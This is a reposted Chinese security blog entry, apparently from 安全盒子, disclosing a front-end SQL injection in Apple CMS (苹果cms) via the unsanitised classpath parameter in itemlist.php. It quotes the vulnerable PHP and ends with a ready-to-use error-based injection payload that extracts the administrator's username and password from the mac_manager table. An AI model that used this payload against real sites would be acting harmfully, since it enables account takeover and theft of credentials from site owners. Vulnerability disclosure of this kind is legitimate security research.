记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

苹果cms前台sql注入一发

2015-01-30 23:45

苹果cms前台sql注入一发,首发于安全盒子

漏洞文件:appmaker/app_interface/itemlist.php

$pagesize = $_REQUEST[‘pagesize’];

$page = $_REQUEST[‘page’];

$classpath = $_REQUEST[‘classpath’];

 

if ($page==””)

$page = 0;

if ($pagesize==””)

$pagesize = 20;

if ($classpath==””)

exit();

 

 

$query = itemlist_1($classpath);

 

REQUEST获取到三个参数之后,直接赋值,没做任何过滤,然后跟了三个判断,只要保证classpath不为空就好,然后将classpath传入itemlist_1的方法中
跟进这个方法看看

 

function  itemlist_1($classpath)

{

global $table;

$query = “SELECT “.table_filed_trans(‘list_filed’, ”).” FROM “.$table[‘list_table_name’].” where “.$table[‘list_filed’][‘list_id’].”=$classpath “;

 

return $query;

}

构造了一条sql语句,classpath就这么毫无防备地进入了sql文中
然后返回这条sql语句,访问这个地址,然后构造classpath=1’看看是什么情况

图片1

写个poc爆管理员账密

2

 

poc:classpath=3 and (select 1 from (select count(*),concat((select concat(char(91),(select m_name from mac_manager),char(58),(select m_password from mac_manager),char(93))),(select (case when (1=1) then 0 else 0 end)),0x23,floor(rand(0)*2))x from information_schema.tables group by x)a)

1扫 “安全盒子” 二维码 ,关注最新安全资讯!

转载苹果cms前台sql注入一发请注明出自:安全盒子

知识来源: www.secbox.cn/hacker/1084.html

阅读:624232 | 评论:0 | 标签:黑客 注入 cms

想收藏或者和大家分享这篇好文章→复制链接地址

“苹果cms前台sql注入一发”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云